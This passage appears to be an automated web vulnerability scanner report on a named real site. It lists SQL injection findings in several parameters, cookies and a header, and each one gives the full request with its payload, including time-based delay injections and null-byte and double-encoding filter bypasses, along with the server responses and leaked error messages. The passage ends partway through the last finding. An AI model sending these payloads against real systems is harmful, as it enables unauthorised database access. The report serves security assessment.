#RIGHT    {}
#MRIGHT    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#HEADER    {}
#MHEADER    {margin-left:0px;margin-right:0px;margin-top:0px;margin-bottom:13px}
#FOOTER    {}
#MFOOTER    {margin-left:6px;margin-right:0px;margin-top:0px;margin-bottom:0px}
#COLB    {;background-image:URL(DOC.
...[SNIP]...
1.49. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the NODE_ID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099'%20and%201%3d1--%20&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:53:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6129
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:13:48 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation
...[SNIP]...
<div id="MTOP">pageUniverselle.asp: [Microsoft][ODBC SQL Server Driver][SQL Server]Ligne 1 : syntaxe incorrecte vers '1'.</div>
...[SNIP]...
1.50. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The NODE_ID parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the NODE_ID parameter. The application took 21232 milliseconds to respond to the request, compared with 1903 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78'waitfor%20delay'0%3a0%3a20'--&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:55:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:15:43 GMT
Cache-control: private

1.51. http://www.b2f-concept.com/KERNEL/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:08:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:07:28 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A08%3A28; expires=Sat, 25-Jun-2011 16:08:28 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=GFAGAOMBNIHABMJDKKEAFNKJ; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de g.n.rer le contexte SSPI
</body>
...[SNIP]...
1.52. http://www.b2f-concept.com/KERNEL/ [U parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The U parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the U parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03' HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response 1

HTTP/1.1 302 Object moved
Date: Fri, 18 Mar 2011 16:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: BO/error.asp?URL%20incorrecte.
Content-Length: 151
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="BO/error.asp?URL%20incorrecte.">here</a>.</body>

Request 2

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03'' HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:59:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28702
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:19:33 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Un logiciel de gestion de contenu parce-qu'un site n'est jamais termin&#233; et doit-&#234;tre en constante &#233;volution afin de fid&#233;liser et d
...[SNIP]...
1.53. http://www.b2f-concept.com/KERNEL/ [U parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The U parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the U parameter. The application took 41933 milliseconds to respond to the request, compared with 1888 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 17:00:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31212
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:20:15 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation
...[SNIP]...
1.54. http://www.b2f-concept.com/KERNEL/ [VISITEUR cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The VISITEUR cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the VISITEUR cookie. The application took 41642 milliseconds to respond to the request, compared with 1997 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/ HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31'waitfor%20delay'0%3a0%3a20'--; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 19 Mar 2011 01:55:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4863
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:15:05 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Une info">
<title>Groupe B2F Concept - Une info</title>
<base href="http://www.b2f-concept.com/KERNEL/">

<link rel="stylesheet" href="default.css
...[SNIP]...
1.55. http://www.b2f-concept.com/KERNEL/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073'

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:07:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:06:50 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A07%3A50; expires=Sat, 25-Jun-2011 16:07:50 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=ECAGAOMBHOPJNMDBCJHIFALL; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de g.n.rer le contexte SSPI
</body>
...[SNIP]...
1.56. http://www.b2f-concept.com/KERNEL/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095%00'; __utmb=179423095.1.10.1300463073

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:07:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:06:41 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A07%3A41; expires=Sat, 25-Jun-2011 16:07:40 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=OBAGAOMBMKDBJLBLHHHELGEO; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de g.n.rer le contexte SSPI
</body>
...[SNIP]...
1.57. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [INFORUB parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp

Issue detail

The INFORUB parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the INFORUB parameter. The application took 125159 milliseconds to respond to the request, compared with 4726 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp?INFORUB={B635DBB9-B21E-40C4-B103-96C56BD4A101}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 01:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26681
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:16:32 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="&lt;A href=&quot;http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp?INFORUB={B635DBB9-B21E-40C4-B103-96C56BD4A101}&amp;amp;DB=CLT3&quot;
...[SNIP]...
1.58. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 1

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 19 Mar 2011 02:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: ../../error.asp?ErrNumber=-2147467259&ErrDescription=[Microsoft][Gestionnaire%20de%20pilotes%20ODBC]%20Source%20de%20donn.es%20introuvable%20et%20nom%20de%20pilote%20non%20sp.cifi.
Content-Length: 320
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../error.asp?ErrNumber=-2147467259&amp;ErrDescription=[Microsoft][Gestionnaire%20de%20pilotes%2
...[SNIP]...

Request 2

GET /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 19 Mar 2011 02:04:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: ../../../?NODE_ID={8352D499-A167-419A-9559-DD43EE0B1508}&DB=CLT3&U={DC5AB262-634F-422B-9D27-B7BC29A08D03}&S=C288FE1C45F9E2514A46B14F29CC2090
Content-Length: 273
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../../?NODE_ID={8352D499-A167-419A-9559-DD43EE0B1508}&amp;DB=CLT3&amp;U={DC5AB262-634F-422B-9D2
...[SNIP]...
1.59. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/CSS.asp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /KERNEL/CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}'&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 18 Mar 2011 17:48:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 264
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>erreur '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch</font>
<p>
<font face="Arial" size=2>/K
...[SNIP]...

Request 2

GET /KERNEL/CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}''&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 17:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1050
Content-Type: text/css
Expires: Fri, 18 Mar 2011 19:48:22 GMT
Cache-control: private

.test {color:red;}

.Ref-COLA {padding:0px 0px 0px 30px;
color:#888888;
}
#BOTTOM .ContainerBodyUsed .Ref-COLA a { color:#888888; font-family:arial,sans serif; font-size:12px
...[SNIP]...
1.60. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/CSS.asp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the id parameter. The application took 22308 milliseconds to respond to the request, compared with 6459 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

